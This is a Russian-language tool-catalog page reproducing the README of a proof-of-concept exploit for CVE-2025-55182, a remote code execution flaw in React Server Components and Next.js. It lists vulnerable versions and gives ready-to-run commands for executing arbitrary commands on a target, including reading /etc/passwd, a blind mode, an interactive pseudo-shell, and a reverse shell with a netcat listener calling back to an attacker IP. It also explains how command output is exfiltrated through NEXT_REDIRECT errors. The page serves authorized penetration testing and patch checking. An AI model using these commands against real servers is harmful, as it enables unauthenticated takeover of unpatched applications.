Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
react2shell-poc — CVE-2025-55182 React2Shell PoC — критическая RCE-уязвимость в React Server Components / Next.js. CVSS 10.0. Эксфильтрация на основе ошибок, реверс-шелл, интерактивный режим. | Kitploit
Инструменты/GitHubGitHub/p3ta00/react2shell-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеОбучение и ОбразованиеИнструмент Удаленного Доступа
GitHubp3ta00/react2shell-poc

react2shell-poc

CVE-2025-55182 React2Shell PoC — критическая RCE-уязвимость в React Server Components / Next.js. CVSS 10.0. Эксфильтрация на основе ошибок, реверс-шелл, интерактивный режим.

912 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

React2Shell - PoC для CVE-2025-55182

Proof of Concept для CVE-2025-55182 — критической уязвимости удалённого выполнения кода без аутентификации в React Server Components.

Оценка CVSS: 10.0 (Critical)

Уязвимость

Уязвимость существует в десериализаторе Flight-протокола React. Используя загрязнение прототипа (prototype pollution) через специально созданные полезные нагрузки, атакующий может добиться произвольного выполнения кода на уязвимых приложениях Next.js.

Затронутые версии

ПродуктУязвимые версииИсправленные версии
React19.0.0 - 19.2.019.0.1, 19.1.2, 19.2.1+
Next.js14.3.0-canary.77 - 16.x15.0.5, 15.1.9, 15.2.6, 16.0.7+

Установка

root@kitploit:~
git clone https://github.com/p3ta00/react2shell-poc.git
cd react2shell-poc
pip install requests

Использование

Выполнение команды с выводом (по умолчанию — эксфильтрация на основе ошибок)

Вывод возвращается напрямую в HTTP-ответе через ошибку NEXT_REDIRECT — callback-сервер не требуется.

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "id"
python3 react2shell-poc.py -t http://TARGET:3000 -c "cat /etc/passwd"

Интерактивный режим

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -i

Проверка уязвимости

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 --check

Слепое выполнение RCE (без вывода)

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "touch /tmp/pwned" --blind

Обратная оболочка (Reverse Shell)

root@kitploit:~
# Запуск слушателя
nc -lvnp 4444

# Отправка полезной нагрузки
python3 react2shell-poc.py -t http://TARGET:3000 --revshell --lhost YOUR_IP --lport 4444

Устаревший способ: эксфильтрация на основе callback

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "id" --listen --lhost YOUR_IP

Параметры

root@kitploit:~
-t, --target       URL цели (обязательно)
-c, --command      Команда для выполнения (по умолчанию вывод через эксфильтрацию на основе ошибок)
--check            Проверка, уязвима ли цель
--blind            Режим слепого RCE (без захвата вывода)
--listen           Использовать callback-сервер вместо эксфильтрации на основе ошибок
-i, --interactive  Интерактивный режим псевдо-оболочки
--revshell         Попытка установить обратную оболочку
--lhost            IP атакующего для callback/обратной оболочки
--lport            Порт для callback (по умолчанию: 9999)
--callback         Ручной callback URL
--timeout          Таймаут запроса в секундах (по умолчанию: 30)

Как это работает

Метод эксфильтрации по умолчанию использует инъекцию ошибки NEXT_REDIRECT:

  1. Выполнить команду и захватить вывод
  2. Выбросить ошибку NEXT_REDIRECT с выводом в поле digest
  3. Next.js сериализует ошибку в Flight-ответе
  4. Вывод появляется непосредственно в теле HTTP-ответа

Это надёжнее, чем эксфильтрация на основе callback, поскольку не требует исходящего сетевого доступа с целевой машины.

Ссылки

  • Wiz Security - Раскрытие React2Shell
  • Анализ Datadog Security Labs
  • NVD - CVE-2025-55182

Отказ от ответственности

Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей. Несанкционированный доступ к компьютерным системам незаконен. Всегда получайте надлежащее разрешение перед тестированием.

Автор

p3ta

Скачать инструмент